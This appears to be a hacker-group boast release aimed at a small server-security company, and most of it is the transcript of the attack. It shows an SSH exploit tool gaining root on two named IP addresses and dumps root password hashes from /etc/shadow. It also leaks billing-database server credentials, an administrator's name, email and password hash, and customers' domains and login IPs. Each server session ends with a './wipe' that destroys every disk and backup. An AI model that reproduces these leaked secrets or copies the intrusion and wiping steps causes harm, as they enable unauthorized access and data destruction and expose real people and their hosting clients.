__ .__ _____ _____/ |_|__| ______ ____ ____ \__ \ / \ __\ | ______ / ___// __ \_/ ___\ / __ \| | \ | | | /_____/ \___ \\ ___/\ \___ (____ /___| /__| |__| /____ >\___ >\___ > \/ \/ \/ \/ \/ Some of you have seen a lot of casualties lately in the webhosting scene: hosting companies being wiped and rm'd at the expense of their clients. While some of this is collateral damage, we're about to show you, ladies and gentlemen, that sometimes you aren't pwned because of who you host but what you say. Practice what you preach. - Why SSANZ? Owned by a kid who claims he can manage, secure and audit servers, he offers a service that he clearly cannot provide, we are against that. LoganNZ : >>Logan of New Zealand. CEO of Server Systems Administration NZ. >> >> Signature: >>Server Systems Administration NZ | SSANZ >>Got Hacked? | 24/7/365 Remote Emergency Support | Specialist Server Management >>Affordable Hosting :: Resellers, Shared & Dedicated Server Systems Server Management $25 - Security & Hardening - $50 : >>Server Management - $25 Per Month >> >>- Full Management - Support, & 3rd Party Installs >>- Monitoring - Included - up to 3 ports. >>- Emergency Recovery >>Server Security - $50 >> >>- Initial Scan & Report >>- Security Hardening & Security Installs/tweaks. >>- IDS, Security Monitoring & mod_sec configured. >>- Finishing Security Scan & SSANZ Custom Scans. >> >> >>Emergency Server Recovery - $150 >> >>- Recover Hacked Server Systems >>- Recover deleted data >>- ANTI-dDOS Services >>- dDOS Investigation Security Worries? Security Audits - 50% OFF : >>Get your site/server audited to ensure your business data is >>secure before you become a statistic. >> >>In the past 6 months, e-crime activity reports have increased by >>45% due to the global economic recession. >> >>What is involved in a Full Security Audit? >> >>External Security >> >> * Scan for Shells/malicious scripts >> * Scan for vulnerable web content ( permissions, RFI's ) >> * Scans for Vulnerable Server Services >> * Vulnerable Ports >> * Testing of TCP handling - dDOS test. >> * Scan for Vulnerable PHP scripts/mods. >> * Control Panel Security Audit ( external ) >> * Multiple Unique SSANZ Custom Scans* >> >> >>Internal Security >> >> * Permissions/Ownership(s) Review >> * Apache/Webserver Security >> * User Account Security & binaries access audit >> * Local RFI Exploits located/patched. >> * System Binary Security Audit >> * Firewall/IPTABLES Audit >> * Bruteforce detection test & audit >> * Root Access Authentication Audit >> * Local PHP Functions Audit >> * Control Panel Security Audit ( Internal ) >> * Kernel Security Audit >> * Additional SSANZ Custom Scans/Audit* We at anti-sec decided to give you a _FREE_ Full Security Audit!* * `rm -rf /` is included. anti-sec:~/pwn# ./map ssanz.net IP: 66.197.143.133 ( osiris.ssanz.net ) WWW: Apache/2.2.11 SSH: SSH-2.0-OpenSSH_4.3 IP: 66.197.204.101 ( devil.ssanz.net ) WWW: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 mod_mono/2.4 mod_auth_passthrough/2.1 mod_bwlimited/1.4 SSH: SSH-2.0-OpenSSH_4.3 anti-sec:~/pwn# cd xpl/ anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.143.133 -p 22 [+] 0wn0wn - anti-sec group [+] Target: 66.197.143.133 [+] SSH Port: 22 [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>] sh-3.2# export HISTFILE=/dev/null sh-3.2# id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) sh-3.2# uname -a Linux osiris.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata #1 SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux sh-3.2# head -n1 /etc/shadow root:$1$t4e0hufX$UH4Q5jTj93EEAODNrSaWO/:14412:0:99999:7::: sh-3.2# w 03:43:43 up 7 days, 54 min, 1 user, load average: 9.01, 9.78, 10.73 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root pts/0 125.238.144.224 20:17 7:26m 13:18 13:18 htop sh-3.2# pwd /root sh-3.2# ls -la total 3008 drwxr-x--- 24 root root 4096 Jul 4 03:43 . drwxr-xr-x 27 root root 4096 Jun 27 02:49 .. -rw------- 1 root root 957 Jun 13 07:24 .accesshash -rw------- 1 root root 1012 Jun 1 10:39 anaconda-ks.cfg -rw------- 1 root root 15460 Jul 3 23:38 .bash_history -rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout -rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile -rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc drwxrwxrwx 3 therockm therockm 4096 Jun 5 07:26 bwm-ng-0.6 -rw-r--r-- 1 root root 141564 Mar 1 2007 bwm-ng-0.6.tar.gz drwxr-xr-x 3 root root 4096 Nov 15 2006 cmm -rw-r--r-- 1 root root 18656 Feb 28 11:32 cmm.tgz drwxr-xr-x 3 root root 4096 Nov 5 2006 cmq -rw-r--r-- 1 root root 14507 Oct 10 2008 cmq.tgz drwxr-xr-x 4 root root 4096 Jun 1 14:33 .cpanel drwxr-xr-x 4 root root 4096 Jun 1 17:10 cpanel3-skel drwx------ 3 root root 4096 Jun 1 13:50 .cpobjcache drwxr-xr-x 10 root root 4096 Apr 13 16:17 csf -rw-r--r-- 1 root root 430121 May 15 12:07 csf.tgz -rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc drwx------ 2 root root 4096 Jun 1 13:54 .elinks -rw-r--r-- 1 root root 1176672 Jul 4 03:40 error_log -rw-r--r-- 1 root root 16 Jun 3 08:34 .forward drwx------ 3 root root 4096 Jun 1 10:39 .gconf drwx------ 2 root root 4096 Jun 1 10:39 .gconfd drwxr-xr-x 4 root root 4096 Jun 10 23:42 .gem drwx------ 2 root root 4096 Jun 1 13:55 .gnupg drwxrwxrwx 5 theweath theweath 4096 Jun 1 17:13 htop-0.8.1 -rw-r--r-- 1 root root 414870 Sep 23 2008 htop-0.8.1.tar.gz -rw-r--r-- 1 root root 561 Jun 27 02:48 .htoprc -rw-r--r-- 1 root root 8144 Jun 6 19:23 index.html -rw-r--r-- 1 root root 4246 Jun 1 10:39 install.log.syslog drwxr-xr-x 6 500 root 4096 Sep 13 2005 iptraf-3.0.0 -rw-r--r-- 1 root root 0 Jun 27 09:21 iptraf-3.0.0.tar.gz -rw-r--r-- 1 root root 0 Jun 27 09:22 iptraf-3.0.0.tar.gz.1 -rw-r--r-- 1 root root 0 Jun 27 09:24 iptraf-3.0.0.tar.gz.2 -rw-r--r-- 1 root root 575169 Jun 27 09:26 iptraf-3.0.0.tar.gz.3 drwx------ 6 root root 4096 Jun 1 14:21 .MirrorSearch -rw------- 1 root root 61 Jun 12 21:04 .my.cnf -rw------- 1 root root 139 Jul 3 10:51 .mysql_history -rwxrwxrwx 1 root root 38688 Dec 1 2008 mysqltuner.pl -rw-r--r-- 1 root root 264 Jul 2 21:43 .pearrc drwxr-xr-x 2 root root 4096 Jun 1 17:04 public_ftp drwxr-xr-x 3 root root 4096 Jun 1 17:04 public_html -rw------- 1 root root 1024 Jun 7 19:50 .rnd drwx------ 3 root root 4096 Jun 1 14:29 .spamassassin drwx------ 2 root root 4096 Jun 2 06:41 .ssh -rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc drwxr-xr-x 3 root root 4096 Jun 7 21:54 tmp -rw------- 1 root root 0 Jun 7 22:01 .trustwavereqs drw------- 2 root root 4096 Jun 3 08:18 whmrbackups drw------- 3 root root 4096 Jun 10 08:25 whmrcorebackups sh-3.2# cat .bash_history htop htop p htop tail -f /var/log/secure tail -f /var/log/secure [snip] nano highperformance.conf service httpd restart nano highperformance.conf service httpd restart nano highperformance.conf nano httpd.conf nano php.conf ls nano modsec2.conf ls [snip] nano visit4cash.net.conf cd .. [snip] netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n ps -aux|grep -i HTTP|wc -l w bwm-ng [snip] netstat -plan|grep :80|awk {.print $5.}|cut -d: -f 1|sort|uniq -c|sort -n netstat -plan|grep :80| awk {.print $5.} |cut -d: -f 1|sort|uniq -c|sort -n netstat -plan|grep :80| awk {.print $5.} |cut -d: -f 1|sort|uniq -c|sort -n netstat -ntu | awk .{print $5}. | cut -d: -f1 | sort | uniq -c | sort -n netstat -an | awk '{print $4}' | awk -F":" '{print $2}' | sort -n -u netstat -nat | awk '{print $6}' | sort | uniq -c | sort -n netstat -nat |grep 202.54.1.10 | awk '{print $6}' | sort | uniq -c | sort -n netstat -atun | awk '{print $5}' | cut -d: -f1 | sed -e '/^$/d' |sort | uniq -c | sort -n [snip] /sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags ALL ACK,RST,SYN,FIN -j DROP /sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP /sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags SYN,RST SYN,RST -j DROP [snip] service cups stop chkconfig cups off service nfslock stop chkconfig nfslock off service rpcidmapd stop chkconfig rpcidmapd off service bluetooth stop chkconfig bluetooth off service anacron stop chkconfig anacron off service avahi-daemon stop chkconfig avahi-daemon off service hidd stop chkconfig hidd off service pcscd stop chkconfig pcscd off [snip] http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso screen wget http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso htop screen wget http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-iso [snip] wget http://fullhide.info/backup-6.24.2009_18-13-16_fullhide.tar.gz htop [snip] wget ftp://iptraf.seul.org/pub/iptraf/iptraf-3.0.0.tar.gz wget ftp://the.wiretapped.net/pub/security/network-monitoring/iptraf/iptraf-3.0.00.tar.gz [snip] wget http://www.logview.org/logview-install chmod +x logview-install ./logview-install rm -rf logview-install sh-3.2# grep sec /etc/userdomains affiliatesecrets.wecloak.info: wecloaki infosecawareness.info: andlyssa secproxy.info: secproxy infosecawareness.andly.ssanz.net: andlyssa greycloud.nakedinsects.com: greyclou serversecuritynz.com: forumz orac.nakedinsects.com: oracnz infernal.nakedinsects.com: infernal nakedinsects.com: ni fluffy.nakedinsects.com: fluffy quickclix.orac.nakedinsects.com: oracnz seco39.ssanz.net: secossan sh-3.2# lastlog | grep -v Never Username Port From Latest root pts/1 125.238.144.224 Fri Jul 3 20:27:03 -0400 2009 simmobim pts/0 118.69.80.114 Fri Jun 12 00:22:04 -0400 2009 mattss pts/1 118.90.48.0 Sun Jun 21 04:44:58 -0400 2009 etasmtco pts/0 189.31.24.129 Sat Jun 20 10:14:51 -0400 2009 sh-3.2# cd ~billing sh-3.2# ls -la total 301252 drwx--x--x 15 billing billing 4096 Jun 28 02:08 . drwx--x--x 737 root root 20480 Jul 4 00:37 .. lrwxrwxrwx 1 billing billing 33 Jun 2 01:58 access-logs -> /usr/local/apache/domlogs/billing -rw------- 1 billing billing 87744924 Jun 14 12:33 backup-6.14.2009_12-32-41_billing.tar.gz -rw------- 1 billing billing 92931478 Jun 28 02:08 backup-6.28.2009_02-06-29_billing.tar.gz -rw------- 1 billing billing 84475934 Jun 3 06:33 backup-6.3.2009_06-32-54_billing.tar.gz -rw------- 1 billing billing 42341015 May 31 21:42 backup-billing9912.tar.gz -rw-r--r-- 1 billing billing 24 May 27 2008 .bash_logout -rw-r--r-- 1 billing billing 176 May 27 2008 .bash_profile -rw-r--r-- 1 billing billing 124 May 27 2008 .bashrc -rw------- 1 billing billing 17 May 27 2008 .contactemail drwxr-xr-x 5 billing billing 4096 May 8 02:48 .cpanel -rw-r----- 1 billing billing 0 Apr 4 06:32 cpbackup-exclude.conf drwxr-xr-x 2 billing billing 4096 Jun 2 01:57 cpmove.psql drwxr-xr-x 3 billing billing 4096 Nov 12 2008 cpmove.psql.1240007789 drwxr-xr-x 2 billing billing 4096 Apr 16 23:24 cpmove.psql.1243922290 -rw-r--r-- 1 billing billing 532304 Jul 4 03:45 error_log drwxr-x--- 4 billing mail 4096 Jan 19 21:39 etc drwxr-x--- 2 billing nobody 4096 May 27 2008 .htpasswds -rw-r--r-- 1 billing billing 7 Nov 12 2008 .lang -rw------- 1 billing billing 15 Jun 28 02:07 .lastlogin drwxrwx--- 10 billing billing 4096 Jul 2 21:43 mail drwxr-xr-x 4 billing billing 4096 Nov 12 2008 .mozilla drwxr-xr-x 3 billing billing 4096 Apr 29 2008 public_ftp drwxr-x--- 24 billing nobody 4096 Jun 28 02:55 public_html drwx------ 4 billing billing 4096 Jun 7 21:53 ssl drwxr-xr-x 7 billing billing 4096 Feb 25 17:59 tmp drwx------ 2 billing billing 4096 May 27 2008 .trash lrwxrwxrwx 1 billing billing 11 Jun 2 01:58 www -> public_html -rw-r--r-- 1 billing billing 658 May 27 2008 .zshrc sh-3.2# cd www/ sh-3.2# ls admin banned.php configuressl.php domainchecker.php init.php logout.php postinfo.html templates viewticket.php whois.php affiliates.php billing contact.php downloads installmingchowping modules _private templates_c _vti_bin aff.php cart.php creditcard.php downloads.php knowledgebase.php networkissues.php register.php tutorials.php _vti_cnf announcements.php cgi-bin dbconnect.php htaccess.txt lang networkissuesrss.php serverstatus.php upgrade _vti_inf.html announcementsrss.php clientarea.php display.php images libs order.php status upgrade.php _vti_log announcements.xml configuration.php dl.php includes link.php passwordreminder.php submitticket.php viewemail.php _vti_pvt attachments configuration.php.new dologin.php index.php login.php pipe supporttickets.php viewinvoice.php _vti_txt sh-3.2# cat configuration.php sh-3.2# mysql Welcome to the MySQL monitor. Commands end with ; or \g. Your MySQL connection id is 11021136 Server version: 5.0.81-community MySQL Community Edition (GPL) Type 'help;' or '\h' for help. Type '\c' to clear the current input statement. mysql> use billing_billing; Reading table information for completion of table and column names You can turn off this feature to get a quicker startup with -A Database changed mysql> show tables; +----------------------------+ | Tables_in_billing_billing | +----------------------------+ | mod_ipmanager | | mod_ipmonitor | | tblaccounts | | tblactivitylog | | tbladdons | | tbladminlog | | tbladminperms | | tbladminroles | | tbladmins | | tbladminsecurityquestions | | tblaffiliates | | tblaffiliatesaccounts | | tblaffiliateshistory | | tblaffiliatespending | | tblaffiliateswithdrawals | | tblannouncements | | tblbannedemails | | tblbannedips | | tblbillableitems | | tblbrowserlinks | | tblcalendar | | tblcancelrequests | | tblclientgroups | | tblclients | | tblconfiguration | | tblcontacts | | tblcredit | | tblcurrencies | | tblcustomfields | | tblcustomfieldsvalues | | tbldomainpricing | | tbldomains | | tbldomainsadditionalfields | | tbldownloadcats | | tbldownloads | | tblemails | | tblemailtemplates | | tblfraud | | tblgatewaylog | | tblhosting | | tblhostingaddons | | tblhostingconfigoptions | | tblinvoiceitems | | tblinvoices | | tblknowledgebase | | tblknowledgebasecats | | tblknowledgebaselinks | | tbllinks | | tblnetworkissues | | tblnotes | | tblorders | | tblpaymentgateways | | tblpricing | | tblproductconfiggroups | | tblproductconfiglinks | | tblproductconfigoptions | | tblproductconfigoptionssub | | tblproductgroups | | tblproducts | | tblpromotions | | tblquoteitems | | tblquotes | | tblregistrars | | tblservers | | tblsslorders | | tbltax | | tblticketbreaklines | | tblticketdepartments | | tblticketescalations | | tblticketlog | | tblticketmaillog | | tblticketnotes | | tblticketpredefinedcats | | tblticketpredefinedreplies | | tblticketreplies | | tbltickets | | tblticketspamfilters | | tbltodolist | | tblupgrades | | tblwhoislog | +----------------------------+ 80 rows in set (0.00 sec) mysql> select name,ipaddress,hostname,username,password from tblservers; +--------------+----------------+------------------+----------+--------------------------------------------------------------------------+ | name | ipaddress | hostname | username | password | +--------------+----------------+------------------+----------+--------------------------------------------------------------------------+ | Osiris | 66.197.143.133 | Osiris.ssanz.net | ssanz | J4WILwNJpxR0KhyuPspLOT37zLzLrZ1wyqctabXg3co= | | Osiris-Radio | 66.197.143.133 | Osiris.ssanz.net | root | +V876e3z7tGn9HXEcOG1TJVPaSsGbj31MnsZ2lw52buNutqcpfBhrPVsKdDssqrh7eDF8g== | | Devil | 66.197.204.101 | devil.ssanz.net | root | n/a/WSvQJp/++la5CREbl9QijpppzdxP0GjijQRXst2nag9E9PuTVrRO3A== | +--------------+----------------+------------------+----------+--------------------------------------------------------------------------+ 3 rows in set (0.00 sec) mysql> select firstname,lastname,email,username,password from tbladmins; +-----------+----------+-----------------+----------+----------------------------------+ | firstname | lastname | email | username | password | +-----------+----------+-----------------+----------+----------------------------------+ | Logan | Douglas | Logan@ssanz.net | Admin | c6df529826cf16ac5bedb424d8ac972b | +-----------+----------+-----------------+----------+----------------------------------+ 1 row in set (0.06 sec) mysql> quit Bye sh-3.2# df -h Filesystem Size Used Avail Use% Mounted on /dev/sda5 2.0G 477M 1.4G 26% / /dev/sda8 875G 147G 684G 18% /home /dev/sda3 9.7G 6.8G 2.5G 74% /usr /dev/sda2 9.7G 7.0G 2.3G 76% /var /dev/sda1 99M 23M 72M 24% /boot /dev/sda6 996M 64M 881M 7% /tmp tmpfs 3.9G 0 3.9G 0% /dev/shm /dev/sdb1 459G 163G 273G 38% /backup sh-3.2# ./wipe sh-3.2# df -h Filesystem Size Used Avail Use% Mounted on /dev/sda5 64Z 64Z 1.5G 100% / /dev/sda8 64Z 64Z 729G 100% /home /dev/sda3 64Z 64Z 3.0G 100% /usr /dev/sda2 64Z 64Z 3.0G 100% /var /dev/sda1 16Z 16Z 0 100% /boot /dev/sda6 64Z 64Z 933M 100% /tmp tmpfs 3.9G 0 3.9G 0% /dev/shm /dev/sdb1 64Z 64Z 296G 100% /backup sh-3.2# exit exit ----------------------------------- osiris [ DOWN ] devil [ UP ] ----------------------------------- anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.204.101 -p 22 [+] 0wn0wn - anti-sec group [+] Target: 66.197.204.101 [+] SSH Port: 22 [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>] sh-3.2# export HISTFILE=/dev/null sh-3.2# id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) sh-3.2# uname -a Linux devil.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata #1 SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux sh-3.2# head -n1 /etc/shadow root:$1$BitobdhB$SAscpWG4O51UZQzxpBxbI1:14407:0:99999:7::: sh-3.2# w 04:10:20 up 4 days, 12:11, 1 user, load average: 3.25, 2.09, 1.68 USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT root pts/0 125.238.144.224 20:18 7:51m 6:38 6:38 htop sh-3.2# pwd /root sh-3.2# ls -la total 1232 drwxr-x--- 23 root root 4096 Jul 4 04:06 . drwxr-xr-x 25 root root 4096 Jun 29 14:33 .. -rw------- 1 root root 957 Jun 13 05:20 .accesshash -rw------- 1 root root 937 Jun 12 00:01 anaconda-ks.cfg -rw------- 1 root root 7258 Jun 30 10:03 .bash_history -rw-r--r-- 1 root root 24 Jan 6 2007 .bash_logout -rw-r--r-- 1 root root 191 Jan 6 2007 .bash_profile -rw-r--r-- 1 root root 176 Jan 6 2007 .bashrc drwxrwxrwx 3 1000 1000 4096 Jun 12 04:45 bwm-ng-0.6 -rw-r--r-- 1 root root 141564 Mar 1 2007 bwm-ng-0.6.tar.gz drwxr-xr-x 3 root root 4096 Nov 5 2006 cmq -rw-r--r-- 1 root root 14507 Oct 10 2008 cmq.tgz drwxr-xr-x 4 root root 4096 Jun 12 02:51 .cpanel drwxr-xr-x 4 root root 4096 Jun 12 03:26 cpanel3-skel drwx------ 3 root root 4096 Jun 12 00:17 .cpobjcache drwxr-xr-x 2 root root 4096 Aug 21 2006 cse -rw-r--r-- 1 root root 12207 Oct 10 2008 cse.tgz drwxr-xr-x 10 root root 4096 Jun 5 05:05 csf -rw-r--r-- 1 root root 431490 Jun 5 10:52 csf.tgz -rw-r--r-- 1 root root 100 Jan 6 2007 .cshrc drwx------ 2 root root 4096 Jun 12 01:51 .elinks -rw-r--r-- 1 root root 16 Jun 13 15:33 .forward drwx------ 3 root root 4096 Jun 11 23:59 .gconf drwx------ 2 root root 4096 Jun 11 23:59 .gconfd drwxr-xr-x 4 root root 4096 Jun 12 04:29 .gem drwx------ 2 root root 4096 Jun 12 01:53 .gnupg drwxrwxrwx 6 1002 1002 4096 Jun 12 04:24 htop-0.8.1 -rw-r--r-- 1 root root 414870 Sep 23 2008 htop-0.8.1.tar.gz -rw-r--r-- 1 root root 561 Jun 12 23:31 .htoprc -rw-r--r-- 1 root root 4239 Jun 12 00:01 install.log.syslog drwx------ 6 root root 4096 Jun 12 02:33 .MirrorSearch -rw------- 1 root root 37 Jun 12 02:11 .my.cnf drwxr-xr-x 3 1000 1000 4096 Jun 12 05:42 mytop-1.6 -rw-r--r-- 1 root root 19720 Feb 16 2007 mytop-1.6.tar.gz -rw-r--r-- 1 root root 264 Jun 23 00:23 .pearrc drwxr-xr-x 2 root root 4096 Jun 12 03:21 public_ftp drwxr-xr-x 3 root root 4096 Jun 12 03:21 public_html -rw------- 1 root root 1024 Jun 12 02:50 .rnd drwx------ 3 root root 4096 Jun 12 02:41 .spamassassin drwx------ 2 root root 4096 Jun 22 09:11 .ssh -rw-r--r-- 1 root root 129 Jan 6 2007 .tcshrc drwxr-xr-x 3 root root 4096 Jun 12 02:40 tmp drwxr-xr-x 2 root root 4096 Jun 16 19:23 .wapi sh-3.2# cat .bash_history sh hninst.sh passwd fdisk -l exit w history screen -ls screen -r 2785.pts-0.devil exit wget http://merovingian.net.nz/htop-0.8.1.tar.gz [snip] csf -a 125.238.144.110 exit cd /home ls wget http://visit4cash.net/backup-6.12.2009_06-46-12_visit4ca.tar.gz [snip] wget http://visit4cash.net/mainfiles.tar.gz mv mainfiles.tar.gz /home/visit4ca/public_html cd /home cd visit4ca cd public_html ls tar zxvf mainfiles.tar.gz [snip] csf -d 89.165.50.38 netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n csf -d 89.165.50.38 netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n csf -d 89.165.50.38 netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n csf -d 89.165.50.38 netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n csf -d 89.165.50.38 netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n csf -d 89.165.50.38 netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n csf -d 89.165.50.38 netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n csf -d 89.165.50.38 netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n csf -d 89.38.206.233 csf --restart netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n csf -d 118.94.59.33 netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n [snip] screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Live/i686/Fedora-11-i686-Live.iso screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedora/x86_64/iso/Fedora-11-x86_64-DVD.iso screen wget http://download.fedoraproject.org/pub/fedora/linux/releases/11/Fedora/x86_64/iso/Fedora-11-x86_64-netinst.iso sh-3.2# cat /etc/userdomains advertising.ssanz.net: adserver forums.visit4cash.net: forumsv4 megacashzone.com: megacash visit4cash.net: visit4ca seanone.com: seanonec backup2.ssanz.net: backup2 *: nobody sh-3.2# df -h Filesystem Size Used Avail Use% Mounted on /dev/sda3 31G 7.5G 22G 26% / /dev/sdb1 452G 35G 394G 9% /home /dev/sda1 99M 23M 72M 24% /boot tmpfs 495M 4.0K 495M 1% /dev/shm /usr/tmpDSK 485M 14M 446M 3% /tmp sh-3.2# who root pts/0 2009-07-03 20:18 (125.238.144.224) sh-3.2# ./wipe sh-3.2# df -h Filesystem Size Used Avail Use% Mounted on /dev/sda3 64Z 64Z 24G 100% / /dev/sdb1 64Z 64Z 417G 100% /home /dev/sda1 16Z 16Z 77M 100% /boot tmpfs 495M 4.0K 495M 1% /dev/shm /usr/tmpDSK 485M 14M 446M 3% /tmp sh-3.2# exit exit ----------------------------------- osiris [ DOWN ] devil [ DOWN ] ----------------------------------- Once again, practice what you preach. Don't claim to be something you're not. Most importantly, don't go after us. We're not the problem. What you say does not align AT ALL with what you actually do with your servers. Fix that first, you dig? ~ There will always be no way out.